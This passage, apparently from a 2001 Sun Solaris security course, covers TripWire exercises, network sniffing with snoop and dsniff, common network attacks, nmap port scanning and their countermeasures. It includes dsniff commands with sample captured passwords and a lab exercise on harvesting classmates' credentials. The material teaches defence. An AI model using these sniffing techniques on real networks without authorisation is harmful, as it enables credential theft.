Note – If you install TripWire without first creating these directories theinstallation process incorrectly creates plain files with these names andfails to install the manual pages. Remove the plain files with the rmcommand, create the directories as above, and install TripWire again.

5. Build and install TripWire with:

# make install

If this fails, correct the config.h file and/or Makefile and run thecommand:

# make cleanBefore re-running the make install command, verify that thecompilation was successful.

# make test6. Verify that the tripwire executable is in your path.

# tripwire -versionTripwire(tm) ASR (Academic Source Release) 1.3.1File Integrity Assessment Software(c) 1992, Purdue Research Foundation, (c) 1997, 1999 TripwireSecurity Systems, Inc. All Rights Reserved, Use Restricted toAuthorized Licensees.

Exercise Solutions


Creating a TripWire Configuration

1. Configure the TripWire tool to generate a database for thesedirectories:

● /etc/passwd

● /etc/shadow

● /usr/bin

2. Select the following options for all checked files:

a. Check the user, group, permissions, and file size attributes.

b. Use file digest algorithm SHA signatures in addition to MD5.

c. Do not check the access time attributes.

3. Rename the existing tw.config database file you created when youinstalled TripWire.

# cd /usr/local/tripwire# mv tw.config sunos5.conf

4. Edit a new configuration file:

# vi tw.config

5. Add the following to the file:

/etc/passwd +ugps17-a2345689/etc/shadow +ugps17-a2345689/usr/bin +ugps17-a2345689

6. Generate a database and use the verbose flag to make sure that thecorrect files and directories are being checked.

# tripwire -v -initialize

7. Copy the database to the default TripWire database directorylocation (/var/tripwire in this example).


Exercise Solutions


Running System Integrity Checks

For this part of the exercise you make changes to the system and runTripWire to detect those changes. Ask your instructor if you have anyquestions about the purpose of any of the tests or the outcome of theintegrity checks.

1. Perform an integrity check on the system.

# tripwire -vWhat changes were found?

No changes should have been found or reported.

2. Change the comment field for the daemon entry in the /etc/passwdfile.

Change the entry to something like this:

daemon:x:1:1: TripWire was here :/:

3. Perform an integrity check on the system.

# tripwire -vDid TripWire report the change?

Yes, TripWire reported that /etc/passwd had been modified.

###changed: -rw-r--r-- root 431 May 7 18:23:14 2001 /etc/passwd### Phase 5: Generating observed/expected pairs for changed files###### Attr Observed (what it is) Expected (what it shouldbe)### ========= ============================= =============================/etc/passwd st_size: 431 414...

4. Refer to the TripWire manual page and run the TripWire tool in quietmode. Record your results here.

# tripwire -qchanged: -rw-r--r-- root 414 May 7 18:28:41 2001 /etc/passwd

5. Update the database to include the change to the /etc/passwd file.

# tripwire -v -update /etc/passwd# cp databases/tw.db_grommit /var/tripwire

Exercise Solutions


6. Perform an integrity check on the database.

# tripwire -v

What did TripWire report?

No changes should have been found or reported.

7. Refer to the tw.config manual page and determine which templateto use with log files that are expected to grow.

The > template reports when the file checked is smaller than the lastrecorded size. This function also reports if someone removes entries from alog file.

8. Create a file called my-log .

# touch /export/home/my-log

9. Add an entry to your tw.config file to monitor your my-log log file.

# vi /usr/local/tripwire/tw.config

10. Add the following to the file:

/export/home/my-log >

The > flag is the log file template described earlier.


# echo Hey there >> /export/home/my-log# cat /export/home/my-logHey there#

12. Initialize your database.

# tripwire -v -initialize# cp databases/tw.db_grommit /var/tripwire

13. Perform a quiet mode integrity check of the system.

# tripwire -q

Record your results here.

Nothing should be reported.

Explain the results.

No changes have been made to the database.

Exercise Solutions



1 # echo Hey there >> /export/home/my-log2 # cat /export/home/my-log3 Hey there4 Hey there5 #


# tripwire -q




The > template only reports if the file is smaller than that recorded in thedatabase.

16. Remove some text from your log file.

1 # vi /export/home/my-log2 # cat /export/home/my-log3 Hey there4 Hey5 #


# tripwire -q




The file is still larger than the image in the database. The > template onlyreports if the file is smaller.

18. Update the TripWire database.

# tripwire -update /export/home/my-log

19. Copy the database to the expected directory.


Exercise Solutions



# tripwire -q




The > template reports only if the file size is smaller than when it was lastchecked.

21. Change text in your log file, taking care to not change the file size.

1 # vi /export/home/my-log2 # cat /export/home/my-log3 Way hello4 Day5


# tripwire -q




The file size remained the same, even though the data was completelychanged.

23. What conclusions can you draw from this result?

The > template is open to exploitation if crackers know that they can covertheir tracks in a log file monitored by TripWire if they change or add datainstead of removing data entries.


Module 10

Attacking Network Data

Objectives


● Describe the term “network sniffing”

● Describe use of common sniffer tools

● Describe common network service attacks

● Describe network DoS attacks

Relevance


Relevance

?!

Discussion – The following questions are relevant to understandingattacks on network data:

● Can you restrict access to your network:

● So that unauthorized systems cannot connect to the network?

● So that there is no unauthorized software on authorizedsystems?

● Does your network extend to a public telecommunications backbone(for example Internet access)?

● Do any of your users send unencrypted user names and passwordsacross the network?

Hint: If your users use telnet , ftp , Simple Network ManagementProtocol (SNMP), Post Office Protocol 3 (POP3), HTTP, and otherTCP/IP services without using secure sockets, then they are sendingplain text passwords regularly.


Attacking Network Data 10-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C





● Garfinkel, Simson, and Spafford, Gene. Practical UNIX & InternetSecurity. O’Reilly & Associates, Inc. 1996.

● Online manual pages for snoop(1) .

● Solaris OE Answerbook 2.

● The dsniff utility ported to Solaris OE 2.x,[http://www.sunfreeware.com ]

Network Sniffing


Network Sniffing

A network sniffer is a program or special device which monitors yournetwork and collects some or all of the data that it finds. The term snifferis used because sniff was the name of the original program developed toanalyze network traffic (the sniff program is owned and marketed byNetwork Associates, Inc.).

Sniffers were developed to enable engineers to debug networkingproblems. They provide packet analysis capabilities letting the engineerview the data in its raw form (streams of octets). Modern sniffers interpretstandard protocols and provide a user-readable summary of data gatheredfrom the network.

Network Sniffing


Code 10-1 shows what output from a sniffer can look like.

Code 10-1 Sniffer Output

192.168.1.1 -> 192.168.1.2 length: 124 TELNET R port=1239

0: 0001 02de 3436 0800 20c1 0efe 0800 4500 ....46.. .. ..E. 16: 006e 9a34 4000 3c06 2102 c0a8 0101 c0a8 .n.4@.<.!....... 32: 0102 0017 04d7 743b f92a 01c5 f61f 5018 ......t;.*....P. 48: 60f4 9c6c 0000 6c6f 6361 6c2e 6373 6872 ..l..local.cshr 64: 6320 2020 206c 6f63 616c 2e6c 6f67 696e c local.login 80: 2020 2020 6c6f 6361 6c2e 7072 6f66 696c local.profil 96: 6520 206d 6b66 7470 2020 2020 2020 2020 e mkftp 112: 2020 6e73 6d61 696c 0d0a 2320 nsmail.. #

Code 10-1 is output from the standard Solaris OE snoop utility whichincludes a complete hexadecimal dump of the packet data after asummary line. The summary tells you that this is a telnet packet fromhost 192.168.1.1 to 192.168.1.2.

This output is a listing from the ls command. The packet data starts atoffset 54 and at offset 120 there is a carriage return and a line feed (CR andLF) pair (hex codes 0D/0A), and a shell prompt (#).

Network Sniffing


Implications of Sniffing

Network sniffing allows potential access to all the data transmitted on thenetwork. With modern client–server–based architectures, especially withthe dominance of Web-based services, a network sniffer can collect largeamounts of data in a very short amount of time.

?!

Discussion – Consider the network you have in your organization andthe type of data that is transmitted across it. For example, do you workfrom a PC and administer your Solaris OE servers using telnet (orX-Windows)? If so, every character you send and receive is transmitted,un-encrypted, across the network. Do you ever use the su command tolog in as the root user? If so, you might have just handed your root userpassword over to an intruder.

Network Sniffing


How Sniffers Work

A network interface card (NIC) can usually only pick up traffic addressedto itself, or broadcast and multicast packets. To sniff the network, the cardmust be put into a special mode, called promiscuous mode, where it picksup all network traffic.

All network cards support promiscuous mode and some operating systemscan provide a means for programs to switch the card into this mode. TheSolaris OE does support the ability to switch a network card into thismode but restricts access to the physical device (/dev/hme ) to the rootuser. PC-based systems running Microsoft Windows 95/98/ME normallycannot deny user access to low-level hardware devices, which allows anyPC user to run sniffing tools.

Because of promiscuous mode security implications, some network cardscan have promiscuous mode disabled in the firmware (effectivelypreventing sniffers from working). However, the firmware can bemodified to re-enable promiscuous mode using standard tools providedby the network card manufacturer.

Network Sniffing


Detecting Sniffers

Detecting whether your network is being sniffed is almost impossible. Afew tools, such as cpm (check promiscuous mode) from Carnegie MellonUniversity (ftp://infor.cert.org/pub/tools ), can detect if a networkinterface is in promiscuous mode. However, this tool must run on the hostconcerned.

General logging mechanisms show network sniffers using up inordinateamounts of network I/O (a very high proportion of input to output) andnetwork sniffers often generate large data capture files over time.

Regular monitoring of suspicious activities can help detect sniffing activityon a host. However, an intelligent intruder can usually hide the sniffer sothat it does not show up in the system logging and monitoring activities.

Network Sniffing


Detecting sniffing on the network itself is currently in its infancy. Twotools that detect sniffing on a network are:

● AntiSniff – Runs on Microsoft Windows only. Available fromSecurity Software Technologies, Inc.http://www.securitysoftwaretech.com/antisniff/

● Sentinel – Runs on UNIX. Available fromhttp://www.packetfactory.net/Projects/Sentinel

Network Sniffing


Defending Against Network Sniffers

There is only one sure way to defend against network sniffing and that isto encrypt all network traffic. Technologies like Secure Sockets Layer (SSL)and Internet Protocol Security (IPSec) are low-level protocol encryptiontools. You can achieve higher–level encryption by using applicationswhich encrypt their data. Tools like Secure Shell (SSH) provide a betteralternative than unencrypted tools like telnet and remote login with therlogin and rsh commands.

Network Sniffing Tools



There are many sniffing tools on the market. Some are expensive andrequire specialized equipment. In fact, all LAN analyzers are specializednetwork sniffers.

There are many low-cost or free software products for UNIX andMicrosoft Windows platforms which do a good job of network sniffing.They might drop an occasional packet of data here and there, but they canstill collect a large amount of data.

The Solaris 8 OE comes with its own sniffer utility called snoop . There isalso a freeware simple-to-use product called dsniff that can harvestpasswords from a network. Harvesting data means collecting only the datayou are interested in while discarding the rest.

Note – Many other tools are available on the market. The tcpdump utilityis popular and widely ported [http://www.tcpdump.org ].



The snoop Utility

The Solaris OE comes with a basic network sniffer in the/usr/sbin/snoop directory (etherfind on SunOS 4). It can be invokedby anyone, but access to the network device is restricted to the root user,effectively making it a superuser-only utility.

However, if an intruder breaks in and assumes the root user identity onany Solaris OE system on your network, the intruder can run snoop todetect network traffic, which might allow the intruder to break into othersystems.

By default, snoop displays a summary of all packet data sniffed:



# snoopUsing device /dev/hme (promiscuous mode)grommit -> wallace TELNET C port=1079

wallace -> grommit TELNET R port=1079 Using device /dev/hmgrommit -> wallace TELNET C port=1079

wallace -> grommit TELNET R port=1079 grommit -> wallgrommit -> wallace TELNET C port=1079

wallace -> grommit TELNET R port=1079 wallace -> gromgrommit -> wallace TELNET C port=1079

The protocol is identified together with the host names (if known) and thefirst few bytes of text in the packet (if the data is readable text).

The snoop output is usually redirected to a file for later analysis. Sendingoutput to the screen slows down the operation of the snoop utility, whichcan cause snoop to miss (or drop) packets of data. Redirecting the data toa file introduces a lower I/O overhead than sending data directly to thescreen. Redirecting the data to a file also avoids recursively collecting thedata sent to the screen when using the telnet command.



The snoop Options

Collect raw network data with snoop using the -o option:

# snoop -o /tmp/snooped

All data is saved to this file, so the file must be on a disk with sufficientfree space. Stop the data collection by killing the snoop utility withControl-C or the kill command.

To examine the results of a data capture, use the -i option with the nameof the raw data file:

# snoop -i /tmp/snooped



The snoop utility has many options and capabilities for filtering ordisplaying the data which are fully described in the manual pages.Table 10-1 shows some of the more commonly used options.

Table 10-1 The snoop Utility Options

Option Usage

-N Creates a names file when capturing data, which maps IPaddresses to host names (same format as /etc/hosts ).

-n filename Uses the named files for IP address resolution instead of using the/etc/hosts file and DNS.

-r Does not map network addresses into host names, which avoidsgenerating DNS traffic while capturing data. You can use a namesfile (see -n and -N options) for name lookup.

-S Includes the packet size on the summary line.

-V Verbose summary mode, which includes additional summary datafor each protocol layer in the captured packet.



For example, Code 10-1 on page 10-5 used the following command line:

# snoop -rSx 0

-v Verbose mode, includes extra header information in the summaryline.

-xstart[,length]

Includes the packet data in the output, starting from the givenoffset for the specified number of octets (or the entire packet if nolength is specified).

Table 10-1 The snoop Utility Options (Continued)

Option Usage



The snoop Packet Filters

The snoop command line uses optional expressions to filter the data beingviewed. Some common optional expressions are:

● Only include packets to and from the named host:

# snoop host hostname

● Only include packets to and from the specified address (which canbe a dotted decimal IP address or a colon-separated 8–byte Ethernetaddress):

# snoop address# snoop net address

● Prefix a host or net address with to or from to view incoming oroutgoing packets.

# snoop to host hostname# snoop from address



● Only include packets for the specified port number, which can be anumber (such as 23) or an entry from the /etc/services directory(such as the telnet command):

# snoop port service

Several other filtering options require more knowledge of the networkpacket structure. Read the snoop manual page for all of the availablecommand–line parameters.

You can make filtering more selective by combining options andexpressions with the logical operators and , or , and not (or ! ).



● To select only ftp packets use:

# snoop port ftp

● To monitor all incoming telnet data to the host grommit use:

# snoop port telnet and host grommit

● To look for SNMP between wallace and grommit and show the datapacket use:

# snoop -x 0 port snmp and wallace and grommit



The dsniff Utility

The dsniff utility is a network and password sniffer that obtainspasswords off of the network. It can be downloaded from the SunFreeware Web site.

The dsniff utility handles ftp , telnet , SMTP, HTTP, POP, SNMP, LDAP,Rlogin, NIS, X11, Symantec pcAnywhere, Microsoft SMB, OracleSQL*Net, Sybase, Microsoft SQL protocols, and many other protocols.

The dsniff utility automatically detects and minimally parses eachapplication protocol, only saving the interesting pieces of information. Forexample, with the telnet command, the dsniff utility saves data sentfrom the client to the server (in other words, the dsniff utility saves whatthe user types in).

The dsniff utility can save its data to a Berkeley DB database format datafile for later analysis or it can write the data to standard output.



Running the dsniff Utility

To run dsniff and save the data to a file called dsniffed , type:

# dsniff -w dsniffed

To read this data file, type:

# dsniff -r dsniffed

The dsniff utility has additional command line options which you canuse if you have special network requirements. However, like the snooputility, the dsniff utility allows filtering expressions on its command line.Some of the useful ones are:

● Only include packets to and from the named host:

# dsniff host hostname

● Only include packets to and from the specified address, which canbe a dotted decimal IP address or a colon-separated 8-byte Ethernetaddress:

# dsniff net address



● Prefix a host or net address with to or from to view incoming oroutgoing packets:

# dsniff to host hostname# dsniff from host address

● Only include packets for the specified port number, which can be anumber (such as 23) or an entry from /etc/services (such as thetelnet command):

# dsniff port service

Like the snoop utility, there are several other filtering options and you canmake the filtering more selective by using the expressions combined withthe logical operators and , or , and not (or ! ).



By default, the dsniff utility captures all the interesting data it sees. Thiscan be a lot of information to examine, so you should filter the data youwant to save by specifying the host or protocol that you are interested in.The dsniff utility captures data until you stop the program usingControl-C or the kill command (if you run the dsniff utility in thebackground).

The dsniff utility captures an entire TCP session, so it only saves data ifthe connection is established and torn down while the dsniff utility isrunning (that is, you do not capture data if someone is already logged inusing the telnet command when you start running the dsniff utility).

Code 10-2 shows how to use the dsniff utility to examine telnet datafor the host wallace .

Code 10-2 Using the dsniff Utility

1 # dsniff -w dsniffed port telnet and host wallace&2 [1] 30883 <continue working >4 # kill %15 # dsniff -r dsniffed6 listening on hme0 [port telnet and host wallace]7 trigger_tcp: decoding port 23 as telnet8 -----------------9 04/26/01 15:21:35 tcp 192.168.1.2.1090 -> wallace.23 (telnet)10 alice11 w0nder12 su13 s3cr3t14 passwd eve15 password16 password17 passwd -f eve18 exit19 exit

Code 10-2 shows everything typed in for one telnet session. At line 10,alice supplies the login name and then the password (“w0nder" on line11). The first action that alice uses is the su command to log in as rootuser, supplying the root user password (s3cr3t ). alice then resets eve ’spassword to the string password .



If an intruder was running the dsniff utility on your network, theintruder would now be in possession of the passwords for the root useraccount as well as two non-administration accounts. The intruder is likelyto be installing back doors on wallace while continuing to run thedsniff utility to try to compromise security on the rest of your systems.

?!

Discussion – Now that you know about the dsniff utility, would youallow users on your network to use the telnet command? Whatalternatives are there?

Network Service Attacks



Network attacks probably form the majority of attacks on a system in amodern IT configuration. Nearly ever computer is connected to a networkand many networks are connected to the Internet.

As an administrator, you have no control over the Internet. All you can dois install defensive measures at the boundary where your networkconnects to the Internet. These measures involve firewalls, proxy servers,demilitarized zones (DMZs), and other techniques.

Your network is vulnerable even if you have taken steps to preventunauthorized systems and users from tapping into the networkinfrastructure. When intruders have access to your network, they canbegin to attack the systems on the network.

Many network attacks can only be undertaken by someone with a goodknowledge of the low-level protocols. This module discusses somenetwork attacks which can be undertaken by an intruder with only asmall amount of networking knowledge.



Packet Replay Attacks

One form of attack that network sniffing can lead to is the Packet ReplayAttack. In this attack, packets of data which have been sniffed from thenetwork are replayed back to a server, usually with a different sourceaddress, trying to fool a server into providing information. Replay attacksare often used to try to obtain Kerberos tickets granting access to othernetwork services.

Every TCP/IP packet has a sequence number which increments aspackets are sent. Replay attacks can predict the next valid sequencenumber and spoof the network packets.



In Solaris OE, the file /etc/default/inetinit can set different initialsequence number generation parameters using the TCP_STRONG_ISSvariable. Possible values are shown in Table 10-2.

You are strongly advised to set the parameter value to 2 to guard againstreplay attacks.

# grep TCP_STRONG /etc/default/inetinitTCP_STRONG_ISS=2

Table 10-2 Possible Values of the TCP_STRONG_ISSVariable

Value Meaning

0 Old-fashioned, sequential, initial–sequence number generation

1 Improved sequential generation, withrandom variance in increment

2 RFC 1948 sequence numbergeneration, unique-per-connection-ID



Vulnerabilities of the sendmail Program

Several network attacks target known weaknesses in standard networkservices. The most notorious network service for being exploited in thisway is the sendmail program. The sendmail program listens on port 25and accepts incoming simple mail transfer protocol (SMTP) requests.

SMTP, like many Internet protocols, is text-based. You can use the telnetcommand to connect into an SMTP server and initiate a SMTP dialog, asshown in Code 10-3.

Code 10-3 SMTP Dialog

# telnet localhost 25220 wallace ESMTP Sendmail 8.9.3+Sun/8.9.3; Fri, 27 Apr 2001 14:32:39+0100 (BST)HELO wallace250 wallace Hello [192.168.1.1], pleased to meet you



In Code 10-3 on page 10-28, you connected to the sendmail program andcan now enter commands to send email. The original version of thesendmail program also allowed you to enter a command to debug thesendmail server, which was a very useful feature during development.The debug command allowed you to run a shell (for debugging) withroot user privileges.

This debug feature was removed from sendmail years ago. But sendmailhas other features which could let an intruder break in to systems. Thesehave slowly been closed down, but even now, there are regular securityalerts about new sendmail vulnerabilities.

You can use several SMTP servers as alternatives to sendmail , such asiPlanet Messaging Server and DMail, because they are more secure.



Buffer Overflow Attacks

The sendmail program, and many other network servers such as thefingerd daemon, have suffered from a common problem known asbuffer overflow.

In basic terms, buffer overflow occurs when the programmer writing thenetwork server fails to limit the amount of data that the client can enterinto the program. When the client program (or an intruder typing in fromthe keyboard) enters too much data for the buffer, the data overwritesother data or the server program itself.

In paper-based terms, buffer overflow is like when you are filling in aform where the box you need to complete is too small to contain theinformation. You continue writing outside the box and hope that isacceptable to the person reading the form. You have just caused the paperequivalent of a buffer overflow.



If the form was printed with a black background and the only white areawas inside the box then you could not cause the buffer overflow (youwould just have to write smaller letters). Many programmers take thesame precautions when writing code, but not all programmers are awareof the problems of buffer overflow and security weakness keeps croppingup in software systems.

When a server buffer overflow occurs, several problems can happen:

● The excess data corrupts part of the program and the server crashes.The service is now unavailable. While some systems mightautomatically restart crashed services, many do not. This is anexample of a DoS attack.

● The excess data overwrites valid data in the program, which cancorrupt the data. This corruption might not be noticed for some time(if ever).

● The excess data overwrites part of the server program with aprogram of its own which, when executed, can enable an intruder tobreak into the system. The infamous Internet Worm released in 1988used this technique to infiltrate copies of itself into a significantportion of the Internet.

Most buffer overflow problems have been found and fixed in commonnetwork servers. However, new servers and enhancements to existingcode often show buffer overflow weaknesses.

If a new buffer overflow weakness is discovered, check to see if atemporary wrapper is available from http://www.auscer.org.au/,which you can use until a patch is released from the vendor.



Web (HTTP) Servers

Web servers are also vulnerable to attack. Web servers are becoming morevulnerable because of the demands on organizations to provideWeb-based services with sophisticated features.

Many Web servers use Common Gateway Interface (CGI) scripts toprovide dynamic content. Most CGI scripts are written using languageslike Perl or Personal Home Page (PHP), which were written for speed andease of program development and not for security. A knowledgeableintruder can exploit the security holes in these languages.

The trend towards using Java™ technology Servlets and JavaServerPages™ (JSP™) as a more secure alternative is helping improve HypertextTransfer Protocol (HTTP) server security.



Network Denial of Service Attacks

A general discussion of DoS attacks was given in Module 4. DoS attacksare quite common. While they might appear to be just a nuisance they areoften serious:

● Losing a server for a few minutes costs most organizations moneyand can adversely affect future business. Losing a server for longerthan a few minutes can have dire consequences for your business.

● If your service is unresponsive (especially if it is a Web service), youmight lose business to a competitor who has not been attacked.

● If the press is told about your “poor” service, you might get badpublicity, which can cause your customers to worry and potentiallytake their business elsewhere.



● If your service becomes unavailable, an intruder might spoof(impersonate) your system (borrow your IP address) to collectinformation about your customers.

● After a successful attack, you can clean your system and reboot.Rebooting is sometimes what an intruder wants you to do. Perhapsthe intruder has successfully broken into your system and needs youto reboot to activate a back door or complete a rootkit installation. ADoS attack is a good way to force a reboot.



Types of Network Denial of Service Attacks

There are many types of DoS ranging from the brute-force approach ofsending large numbers of requests to a server to more subtle attacks usingnetwork protocol features.

Three of the network protocol attacks are:

● TCP SYN flooding

● Ping of death

● Smurf

TCP SYN Flood Attack

As part of the initiation of a TCP service connection (such as ftp , telnet ,HTTP, or SMTP), a three-way handshake must take place as shown inFigure 10-1 on page 10-36.



Figure 10-1 TCP Three-Way Handshake

The steps in a three-way handshake are:

1. The client sends a synchronize (SYN) message to the server.

2. The server responds with a synchronize acknowledgment(SYN/ACK) message to the client.

3. The client completes the initialization of the TCP session by sendingan ACK back to the server.

In a TCP SYN flood attack, the client sets a non-existent system as thereply address of the initial SYN message. The server sends the SYN/ACKresponse to the non-existent server and never gets the final ACK response.

Eventually the server times out the connection (the time-out can rangefrom 75 seconds to 23 minutes depending upon network configurationparameters). During the time-out period the server is holding onto kernelresources required during the TCP session initialization.

TCP initialization generally requires more kernel resources than when thesession is established. While a server might support hundreds orthousands of concurrent TCP sessions, it might only be able to support afew tens of connections in the initialization phase. If the client sends afalsified SYN packet every 10 seconds, it could completely disable TCPservices on a server by causing the kernel to run out of resources.



TCP SYN flood attacks are popular because the client has little work to doto disable a server.

If the client’s SYN packet mistakenly specifies a reply address of a validsystem then that system sends a reset (RST) message to the server for theunexpected SYN/ACK message. The server resets the TCP sessionreleasing all the kernel resources tied up for the initialization whicheffectively nullifies the TCP SYN flood.

Note – See the Sun Microsystems Security Bulletin: #00136, 9 Oct. 1996 formore information (available in the Security Bulletin Archive athttp://sunsolve.sun.com/pub-cgi/secBulletin.pl ). A general,cross-environment discussion of this issue is available from CERT athttp://www.cert.org/advisories/CA-1996-21.html .



Ping of Death Attack

The Ping of Death attack is another DoS attack. The attack involvessending an IP packet that is too large to be a legal packet (more than 65535bytes in size). The attack usually uses the low-level Internet ControlMessage Protocol (ICMP) packets that the ping command uses.

The packet is fragmented into packets at the Maximum Transfer Unit(MTU) size for transmission over the network. The reassembly stage onthe remote machine overflows memory because so many larger-than-expected packets are received in a short period of time.

Note – The default MTU on a Solaris OE platform using Ethernet is1500 bytes. The Solaris OE on the SPARC™ system is immune to thisattack. Unpatched Solaris OE x86 systems (2.5.1 and lower) arevulnerable.



Smurf Attack

A Smurf attack is simple and effective. It uses the same low-level ICMPprotocol that the ping utility uses.

Usually, the ping utility tests to see if a particular server is online. A clientsends a ping message to the server and the server automatically sends themessage back to the client (the name ping derives from the sound madeby sonar echo detection devices used during World War II).

A Smurf attack falsifies the reply address in the ping ICMP packet bysetting it to the address of the system under attack. The client then sendsthe ping message to the broadcast address for the network containing thesystem under attack.

The result is immediate and dramatic. Every host on the network receivesthe ping message and echoes it back, not to the intruder, but to the systemwhose address was in the ICMP reply field. The system under attackreceives up to 254 ping responses in a very short period of time.



If the system were attacked only once, the system might survive andprocess the ping replies, but the target’s network is temporarilyoverloaded. However, if you broadcast a ping packet every second to thenetwork, you tie up all available network bandwidth and swamp thetarget system with network packets. As network and CPU resources areexhausted, the system slows to a crawl.

A user with a 28.8-kilobit-per-second modem can put out enoughbandwidth to fill one-third of the capacity of a T1 (1.54 megabits/sec.)line. Yale University removed its Internet Relay Chat (IRC) server becauseof these attacks and New York University was once flooded so badly itwas off the network for two weeks.



Smurf Countermeasures

Smurf is so nasty that you should always implement the Solaris OEcountermeasure. The solution is to disable ping replies to broadcastaddresses. Do this by adding the following line to the /etc/init.d/inetfile as part of the network startup:

ndd -set /dev/ip ip_respond_to_echo_broadcast 0



Recognizing Network Attacks

It is difficult from a Solaris OE server to recognize network attacks.Specialized network monitoring is often required to detect attacks likeTCP SYN, Ping of Death, and Smurf.

On a server, network attacks are usually seen after the event; they are notdetected until they have been successful. In fact, many network attacks goentirely unnoticed unless they are DoS attacks.



Port Scanning Using the nmapUtility

One technique intruders use while setting up a network attack is to scan aserver for all the services running. This process is know as a port scan andthe best known utility for this is nmap (nmap can be obtained fromhttp://www.insecure.org/nmap ).

The nmap utility attempts to connect to every port on your server. If thenmap utility makes a successful connection, it attempts to identify theservice on that port by analyzing any data sent out by the server, asshown in Code 10-4.

Code 10-4 Sample nmap Output

# nmap -P0 192.168.0.250

Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )Interesting ports on sunfrog (192.168.0.250):(The 1505 ports scanned but not shown below are in state: closed)Port State Service7/tcp open echo9/tcp open discard



13/tcp open daytime19/tcp open chargen21/tcp open ftp23/tcp open telnet37/tcp open time111/tcp open sunrpc139/tcp open netbios-ssn512/tcp open exec513/tcp open login514/tcp open shell515/tcp open printer540/tcp open uucp2049/tcp open nfs4045/tcp open lockd6000/tcp open X116112/tcp open dtspc7100/tcp open font-service8888/tcp open sun-answerbook32774/tcp open sometimes-rpc1132775/tcp open sometimes-rpc1332776/tcp open sometimes-rpc1532777/tcp open sometimes-rpc1732778/tcp open sometimes-rpc1932779/tcp open sometimes-rpc2132780/tcp open sometimes-rpc2332786/tcp open sometimes-rpc2532787/tcp open sometimes-rpc27

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds



Host Information From the nmapUtility

If the nmap utility is connected to the sendmail port shown in Code 10-3on page 10-28, it could detect from the prompt string that this is anExtended Simple Mail Transfer Protocol (ESMTP) server (it supports anewer version of the SMTP which is a superset of the SMTP service).

Using the information it obtains from a service’s data output, the nmaputility can determine a lot about your server. For example, the nmaputilitycan look at Code 10-3 on page 10-28 and determine the following:

● Server name – wallace

● Operating system and version – Solaris OE 8.9.3

● Server version – sendmail 8.9.3

● Date – The date and time on the server



With this information, the intruder can look up known weaknesses in theoperating system and in the program versions and then attempt to breakin to the system. Even knowing which ports are open and which areclosed can enable the nmap utility to determine the system type (firewall,router, UNIX, Solaris OE, and so on).

Detecting Port Scanning

Port scanning usually involves a large number of connections arriving atyour server over a short period of time. Often, the connections stepthrough the port numbers in numeric order.

Scanning defense products, such as PortSentry (obtainable fromhttp://www.psionic.com/abacus ) can recognize this activity. The usualdefense is to reconfigure the kernel (or network interface) to refuse toaccept connections from the system attempting the port scan. The kernelconfiguration can be automated in some of the scanning defense tools.

Note – Some legitimate tools, such as SAINT, can be detected by portscanning defenses.

Exercise: Using Network Sniffing



In this exercise, you will complete the following tasks:

● Use the snoop utility to sniff network traffic

● Install the dsniff utility

● Use the dsniff utility to harvest user names and passwords fromthe network

Preparation

There is no special preparation required for these tasks.

Tasks

Working in pairs, use the snoop and dsniff utilities to sniff Telnetnetwork traffic between two different workstations created by the telnetcommand. Due to the implementation of the Solaris TCP/IP stack, youcannot correctly sniff network traffic if the source and destinationworkstations are the same machine.

Task – Using the snoop Utility to Sniff Network Traffic

Follow these steps:

1. Obtain the IP addresses of your system and the workstation of theperson next to you. Run the snoop utility to collect data between thetwo workstations.

2. With your colleague’s approval, log in to the other workstation usingthe telnet command.

3. Log out and connect again using the ftp command.

4. Stop the snoop command and examine the data you have collected.Identify the login name and password you used for both telnet andftp commands.



5. Run the snoop utility again. Watch for ftp connections into yourhost. Use the ftp command to connect to your host to make surethat you see your connection.

6. Examine the data you collected and identify the login name andpassword you used. It should be easier this time, because you haveonly ftp data to examine.

Task – Installing the dsniff Utility

You can download the dsniff utility from the Sun Freeware Web site. Acopy has already been downloaded and saved in the /usr/local/pkgdirectory. Install this SVR4 package using the pkgadd command. You alsoneed to install the OpenSSL and libpcap libraries, which are availablefrom the same Web site and the /usr/local/pkg directory.

Task – Using the dsniff Utility

Follow these steps:

1. Obtain the IP address of your system and run the dsniff utility tocollect telnet data for your workstation and place the data into adata file.

2. In a separate window, use the telnet command to log in to yourworkstation and then use the su command to log in as root user.

3. Log out, stop the dsniff utility, and examine the passwords that youcaptured.

4. Run the dsniff utility for the whole network and collect passwordsfrom your colleagues. Because they are doing the same to you, givethem some data to work with by using the telnet command tologin to your own machine (or a colleague’s with their approval). Donot forget to log out again so that the session data can be captured.

Note – If you have used one of your favorite passwords for an account onyour system, do not log in to this account. You do not want yourcolleagues to be aware of passwords that you use back in the office. Usethe sample accounts for alice , bob , and eve for the passwords, becausethese accounts are known to all users on the course.

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

The following are solutions to the exercises. If you have any questionsabout either the exercises or the given solutions please ask your instructor.

Using the snoop Utility to Sniff Network Traffic

1. Assuming your workstation IP address is 192.168.1.107 and yourcolleague’s is 192.168.1.108, use the following command to monitortraffic between the two systems:

# snoop 192.168.1.107 and 192.168.1.108

5. To monitor incoming ftp traffic on your host use:

# snoop 192.168.1.107 and port ftp

or

# snoop host localhost and port ftp

Installing the dsniff Utility

Install the dsniff utility using:

# cd /usr/local/pkg# pkgadd -d libpcap-0_6_1-sol8-sparc-local# pkgadd -d openssl-0_9_6-sol8-sparc-local# pkgadd -d dsniff-2.3-sol8-sparc-local

Using the dsniff Utility

1. Save telnet data to a file called data1 for your system only with:

# dsniff -w data1 host localhost and port telnet

2. In a separate window, use the telnet command to log in to yourworkstation and then use the su command to log in as root user.

Exercise Solutions


3. Type Control-C to stop this command after running your telnetsession from another window. View the collected data using:

# dsniff -r data1

4. Collect all telnet data on the network with:

# dsniff port telnet

This displays the captured data as it is collected, but only when thecaptured telnet session terminates.


Module 11

Securing Network Data

Objectives


● Describe the basic aspects of the Secure Sockets Layer (SSL)

● Explain why SSL is required, and what it does

● Configure secure communications between hosts using IPsec

Relevance


Relevance

?!

Discussion – The following questions are relevant to understanding thepurpose of securing the low-level data transferred across your networks:

● How do you secure low-level communications between hosts?

● Is there a mechanism that allows you to use the telnet programsecurely to log in to your hosts?


Securing Network Data 11-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C



The following additional resources may be found useful when attemptingto understand SSL.

● For information on SSL:[http://www.openssl.org ]

● General cryptography:[http://www.ssh.com/tech/crypto ]

